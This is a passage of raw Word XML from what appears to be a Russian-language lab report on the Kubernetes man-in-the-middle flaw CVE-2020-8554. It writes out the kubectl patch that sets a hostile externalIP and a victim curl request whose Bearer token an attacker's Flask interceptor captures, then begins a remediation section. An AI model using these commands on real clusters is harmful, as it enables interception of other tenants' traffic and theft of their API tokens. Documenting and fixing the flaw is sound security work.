      <w:r>
        <w:t>А</w:t>
      </w:r>
      <w:r w:rsidR="00BD5AEB" w:rsidRPr="00B400B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD5AEB">
        <w:t>также</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yaml</w:t>
      </w:r>
      <w:r w:rsidRPr="00B400B6">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:r w:rsidRPr="00B400B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidR="00BD5AEB" w:rsidRPr="00B400B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD5AEB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pod</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>namespace</w:t>
      </w:r>
      <w:r w:rsidRPr="00B400B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">жертвы, который хранит данный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secret</w:t>
      </w:r>
      <w:r>
        <w:t>, как переменную окружения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD3579B" w14:textId="11310FCB" w:rsidR="00B400B6" w:rsidRDefault="000B2D7D" w:rsidP="000B2D7D">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r w:rsidRPr="000B2D7D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22379C1D" wp14:editId="4A6CD54F">
            <wp:extent cx="5125165" cy="4039164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="197611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175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A13F" w14:textId="272C9FAA" w:rsidR="000B2D7D" w:rsidRPr="00311E8D" w:rsidRDefault="000B2D7D" w:rsidP="000B2D7D">
      <w:pPr>
        <w:pStyle w:val="-"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Yaml-config </w:t>
      </w:r>
      <w:r>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D7D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Pod </w:t>
      </w:r>
      <w:r>
        <w:t>жертвы</w:t>
      </w:r>
      <w:r w:rsidR="00311E8D" w:rsidRPr="00311E8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D10F65" w14:textId="77777777" w:rsidR="000B2D7D" w:rsidRPr="00311E8D" w:rsidRDefault="000B2D7D" w:rsidP="000B2D7D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="551C385E" w14:textId="048E03B8" w:rsidR="000B2D7D" w:rsidRDefault="000B2D7D" w:rsidP="000B2D7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc231834653"/>
      <w:r>
        <w:t>практическая реализация</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="1DAD4F41" w14:textId="01D20147" w:rsidR="000B2D7D" w:rsidRDefault="000B2D7D" w:rsidP="000B2D7D">
      <w:r>
        <w:t xml:space="preserve">Для перехвата трафика на стороне атакующего было создано приложение-перехватчик на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flask</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D7D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">которое будет развернуто в контейнере, над которым будет работать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pod</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2D7D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>атакующего</w:t>
      </w:r>
      <w:r w:rsidR="009C0F4C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D66456" w14:textId="5BD2E778" w:rsidR="009C0F4C" w:rsidRDefault="009C0F4C" w:rsidP="009C0F4C">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r w:rsidRPr="009C0F4C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4506CBE6" wp14:editId="797D9C73">
            <wp:extent cx="6480175" cy="2841625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11948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99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21E0" w14:textId="24107A32" w:rsidR="009C0F4C" w:rsidRDefault="009C0F4C" w:rsidP="009C0F4C">
      <w:pPr>
        <w:pStyle w:val="-"/>
      </w:pPr>
      <w:r>
        <w:t>Приложение перехватчик</w:t>
      </w:r>
      <w:r w:rsidR="00311E8D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77321DC3" w14:textId="64F0D074" w:rsidR="009C0F4C" w:rsidRDefault="00E10AEF" w:rsidP="009C0F4C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Далее оно было загружено собрано в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10AEF">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>контейнер и развенуто на рабочей ноде атакующего.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DACE12F" w14:textId="77777777" w:rsidR="00E10AEF" w:rsidRPr="00AA223A" w:rsidRDefault="00E10AEF" w:rsidP="009C0F4C"/>
    <w:p w14:paraId="40020360" w14:textId="2171B817" w:rsidR="00E10AEF" w:rsidRDefault="00E10AEF" w:rsidP="00E10AEF">
      <w:pPr>
        <w:pStyle w:val="a"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10AEF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22B01F07" wp14:editId="1D6E26C0">
            <wp:extent cx="6480175" cy="1570355"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39315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58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33FE" w14:textId="3721BB05" w:rsidR="00E10AEF" w:rsidRDefault="00E10AEF" w:rsidP="00E10AEF">
      <w:pPr>
        <w:pStyle w:val="-"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сборка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00E10AEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>контейнера с приложением-перехватчиком</w:t>
      </w:r>
      <w:r w:rsidR="00311E8D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EEA504" w14:textId="77777777" w:rsidR="00E10AEF" w:rsidRDefault="00E10AEF" w:rsidP="00E10AEF"/>
    <w:p w14:paraId="11BC8B45" w14:textId="54C5BC27" w:rsidR="00E10AEF" w:rsidRDefault="00E10AEF" w:rsidP="00E10AEF">
      <w:r>
        <w:t xml:space="preserve">Далее </w:t>
      </w:r>
      <w:r w:rsidR="001479E8">
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="001479E8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yaml</w:t>
      </w:r>
      <w:r w:rsidR="001479E8" w:rsidRPr="001479E8">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="001479E8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:r w:rsidR="001479E8" w:rsidRPr="001479E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001479E8">
        <w:t xml:space="preserve">атакующего было внесено обновление, добавляющее </w:t>
      </w:r>
      <w:r w:rsidR="001479E8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>externalIP</w:t>
      </w:r>
      <w:r w:rsidR="001479E8">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B384F4" w14:textId="77777777" w:rsidR="001479E8" w:rsidRPr="001479E8" w:rsidRDefault="001479E8" w:rsidP="00AD2B74">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001479E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kubectl -n tenant-b patch service hijack-external-api \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D00643F" w14:textId="77777777" w:rsidR="001479E8" w:rsidRPr="001479E8" w:rsidRDefault="001479E8" w:rsidP="001479E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001479E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --type=merge \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4312BC66" w14:textId="77777777" w:rsidR="001479E8" w:rsidRPr="001479E8" w:rsidRDefault="001479E8" w:rsidP="001479E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001479E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001479E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p '{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001479E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"spec</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001479E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>":{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001479E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"externalIPs</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001479E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>":[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001479E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"192.0.2.123</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001479E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"]}}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001479E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06226679" w14:textId="40D2641B" w:rsidR="001479E8" w:rsidRPr="00AA223A" w:rsidRDefault="001479E8" w:rsidP="001479E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001479E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --as=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001479E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system:serviceaccount</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001479E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:tenant-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001479E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>b:attacker</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="76BCEDF4" w14:textId="67649C76" w:rsidR="001479E8" w:rsidRDefault="001479E8" w:rsidP="001479E8">
      <w:r>
        <w:t xml:space="preserve">В данном обновлении был выставлен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="001479E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="001479E8">
        <w:t xml:space="preserve"> 192.0.2.123, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">следовательно контейнер перехватчика будет развернут на этом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r>
        <w:t>. Следовательно, если жертва отправит данный</w:t>
      </w:r>
      <w:r w:rsidR="00065B02">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00065B02">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запрос:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442563DC" w14:textId="77777777" w:rsidR="001479E8" w:rsidRPr="00065B02" w:rsidRDefault="001479E8" w:rsidP="001479E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kubectl -n tenant-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> exec victim -- \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6974C3AA" w14:textId="105CBF8C" w:rsidR="001479E8" w:rsidRPr="00065B02" w:rsidRDefault="001479E8" w:rsidP="001479E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sh -c 'curl -sS -X POST \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F833B4E" w14:textId="3F571D71" w:rsidR="001479E8" w:rsidRPr="00065B02" w:rsidRDefault="001479E8" w:rsidP="001479E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Authorization: Bearer $API_TOKEN" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2887046A" w14:textId="77777777" w:rsidR="001479E8" w:rsidRPr="00065B02" w:rsidRDefault="001479E8" w:rsidP="001479E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    -H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC1319E" w14:textId="77777777" w:rsidR="001479E8" w:rsidRPr="00065B02" w:rsidRDefault="001479E8" w:rsidP="001479E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d "{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\"amount\":</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100,\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"currency\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>":\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>USD\"}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1740D2" w14:textId="349975CE" w:rsidR="001479E8" w:rsidRPr="00065B02" w:rsidRDefault="001479E8" w:rsidP="001479E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    http://192.0.2.123:5000/v1/payments'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7771A82B" w14:textId="520AD959" w:rsidR="009C0F4C" w:rsidRDefault="00065B02" w:rsidP="00065B02">
      <w:r>
        <w:t xml:space="preserve">Где указан тот же самый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00065B02">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">как и в поле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>externalIPs</w:t>
      </w:r>
      <w:r w:rsidRPr="00065B02">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">у атакующего, а также для авторизации был указан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00065B02">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>токен, который будет скомпрометирован атакующей стороной.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2D6F98" w14:textId="28CC5E94" w:rsidR="00065B02" w:rsidRDefault="00065B02" w:rsidP="00065B02">
      <w:r>
        <w:t>Ответ от сервера будет таким:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306842AC" w14:textId="2B3E0839" w:rsidR="00065B02" w:rsidRDefault="00065B02" w:rsidP="00065B02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00065B02">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>MITM Flask responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E5720D" w14:textId="781D5D26" w:rsidR="00065B02" w:rsidRPr="00AA223A" w:rsidRDefault="00065B02" w:rsidP="00065B02">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Следовательно перехватчик получил запрос и корректно вернул ответ с кодом 200.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176DB531" w14:textId="2D8A0111" w:rsidR="00CC77F3" w:rsidRDefault="00CC77F3" w:rsidP="00065B02">
      <w:r>
        <w:t>В логах перехватчика токен авторизации будет скомпрометирован.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F645C5E" w14:textId="531722A3" w:rsidR="00CC77F3" w:rsidRDefault="00CC77F3" w:rsidP="00065B02"/>
    <w:p w14:paraId="1ADE8DC4" w14:textId="29F6B64F" w:rsidR="00CC77F3" w:rsidRDefault="00CC77F3" w:rsidP="00CC77F3">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC77F3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78BCB1EA" wp14:editId="1D4F168C">
            <wp:extent cx="6480175" cy="1913890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26431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152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69D4" w14:textId="300B289C" w:rsidR="00CC77F3" w:rsidRPr="00CC77F3" w:rsidRDefault="00CC77F3" w:rsidP="00CC77F3">
      <w:pPr>
        <w:pStyle w:val="-"/>
      </w:pPr>
      <w:r>
        <w:t>Компрометация токена жертвы</w:t>
      </w:r>
      <w:r w:rsidR="00311E8D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139E51B2" w14:textId="44611AA0" w:rsidR="00CC77F3" w:rsidRDefault="00CC77F3" w:rsidP="00CC77F3">
      <w:r>
        <w:t xml:space="preserve">Так, как распечатывание логов было в поле атакующего, который не имеет доступа к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Secret</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC77F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>жертвы, где указан токен авторизации, то его наличие в логах является компрометацией.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C1954" w14:textId="70D2606E" w:rsidR="00D344B9" w:rsidRDefault="00AD2B74" w:rsidP="00D344B9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc231834654"/>
      <w:r w:rsidRPr="00757DB2">
        <w:t>CVE-2020-8554</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> устранение уязвимости</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="56D4DBE7" w14:textId="76C02FC1" w:rsidR="00AD2B74" w:rsidRDefault="00AD2B74" w:rsidP="00AD2B74">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc231834655"/>
      <w:r>
        <w:t xml:space="preserve">запрет на создание </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>externalips</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">через </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2B74">
        <w:t>Vali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>datingadmissionpolicy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="62B17B12" w14:textId="4A82D3F1" w:rsidR="00AD2B74" w:rsidRPr="00AA223A" w:rsidRDefault="00AD2B74" w:rsidP="00AD2B74">
      <w:r>
        <w:t xml:space="preserve">Для устранения необходимо добавить политику, запрещающую создание </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>externalIPs</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2B74">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Для наглядности, ее создание будет в поле администратора. Также, если опасные </w:t>
      </w:r>
      <w:r>
